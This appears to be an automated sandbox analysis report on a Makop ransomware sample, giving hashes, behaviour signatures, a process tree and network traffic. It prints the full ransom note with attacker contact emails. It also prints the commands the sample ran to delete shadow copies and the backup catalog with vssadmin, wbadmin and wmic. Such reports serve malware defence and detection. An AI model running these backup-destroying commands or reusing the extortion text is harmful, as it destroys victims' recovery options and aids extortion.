Resubmissions

09/03/2023, 20:01 UTC

230309-yrrgwsbf7v 10

22/12/2020, 13:17 UTC

201222-wsc3nmern2 10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22/12/2020, 13:17 UTC

General

  • Target

    f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe

  • Size

    117KB

  • MD5

    f64ecdec4c84ac7ef0ca6c2ef4d94eea

  • SHA1

    7c88af3c8a27402da1d67cfaa1a02555f1c7945d

  • SHA256

    fc257f64a0279bb5ae221b968d3f38bbb7237a8475c165c5a8430fe6633e3fe6

  • SHA512

    87b8a1c6098a67a6a7f61e154deba8c16a5b421e5157183b40f808c23187ec46e046d7f4ac006d375fcf66000da7da588c9105f9acba5471604255d15c1ac8f7

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\readme-warning.txt

Family

makop

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: akzhq1010@tutanota.com or akzhq1010@cock.li .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don't want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
Emails

akzhq1010@tutanota.com

akzhq1010@cock.li

Signatures

  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
    "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
      "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe"
      2⤵
      • Modifies extensions of user files
      • Adds Run key to start application
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
        "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
        3⤵
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
          "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
          4⤵
            PID:1088
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:324
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:1052
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
        • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
          "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
          3⤵
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            "C:\Users\Admin\AppData\Local\Temp\f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe" n1224
            4⤵
              PID:1168
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:784
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:1808
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
            PID:1388

          Network

          • flag-unknown
            DNS
            iplogger.org
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            8.8.8.8:53
            Request
            iplogger.org
            IN A
            Response
            iplogger.org
            IN A
            88.99.66.31
          • flag-unknown
            GET
            https://iplogger.org/1Bucq7
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            88.99.66.31:443
            Request
            GET /1Bucq7 HTTP/1.1
            Referer: B023785B;2.16
            Host: iplogger.org
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Server: nginx
            Date: Tue, 22 Dec 2020 13:18:56 GMT
            Content-Type: image/png
            Transfer-Encoding: chunked
            Connection: keep-alive
            Set-Cookie: PHPSESSID=t47evsr94tu3qt6488e11e5i32; path=/; HttpOnly
            Pragma: no-cache
            Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
            Cache-Control: no-cache
            Expires: Thu, 01 Jan 1970 00:00:01 GMT
            Answers:
            whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
            Strict-Transport-Security: max-age=31536000; preload
            X-Frame-Options: DENY
          • flag-unknown
            DNS
            www.download.windowsupdate.com
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            Remote address:
            8.8.8.8:53
            Request
            www.download.windowsupdate.com
            IN A
            Response
            www.download.windowsupdate.com
            IN CNAME
            wu-fg-shim.trafficmanager.net
            wu-fg-shim.trafficmanager.net
            IN CNAME
            2-01-3cf7-0009.cdx.cedexis.net
            2-01-3cf7-0009.cdx.cedexis.net
            IN CNAME
            wu.azureedge.net
            wu.azureedge.net
            IN CNAME
            wu.ec.azureedge.net
            wu.ec.azureedge.net
            IN CNAME
            wu.wpc.apr-52dd2.edgecastdns.net
            wu.wpc.apr-52dd2.edgecastdns.net
            IN CNAME
            hlb.apr-52dd2-0.edgecastdns.net
            hlb.apr-52dd2-0.edgecastdns.net
            IN CNAME
            cs11.wpc.v0cdn.net
            cs11.wpc.v0cdn.net
            IN A
            93.184.221.240
          • flag-unknown
            DNS
            crl.verisign.com
            Remote address:
            8.8.8.8:53
            Request
            crl.verisign.com
            IN A
            Response
            crl.verisign.com
            IN CNAME
            crl-symcprod.digicert.com
            crl-symcprod.digicert.com
            IN CNAME
            cs9.wac.phicdn.net
            cs9.wac.phicdn.net
            IN A
            72.21.91.29
          • 88.99.66.31:443
            https://iplogger.org/1Bucq7
            tls, http
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            876 B
            6.9kB
            9
            10

            HTTP Request

            GET https://iplogger.org/1Bucq7

            HTTP Response

            200
          • 8.8.8.8:53
            iplogger.org
            dns
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            58 B
            74 B
            1
            1

            DNS Request

            iplogger.org

            DNS Response

            88.99.66.31

          • 8.8.8.8:53
            www.download.windowsupdate.com
            dns
            f64ecdec4c84ac7ef0ca6c2ef4d94eea.exe
            76 B
            325 B
            1
            1

            DNS Request

            www.download.windowsupdate.com

            DNS Response

            93.184.221.240

          • 8.8.8.8:53
            crl.verisign.com
            dns
            62 B
            146 B
            1
            1

            DNS Request

            crl.verisign.com

            DNS Response

            72.21.91.29

          MITRE ATT&CK Enterprise v6

          Downloads

          • memory/1224-5-0x0000000000400000-0x000000000041F000-memory.dmp

            Filesize

            124KB

          • memory/1224-3-0x0000000000400000-0x000000000041F000-memory.dmp

            Filesize

            124KB

          • memory/1636-17-0x000007FEF5B70000-0x000007FEF5DEA000-memory.dmp

            Filesize

            2.5MB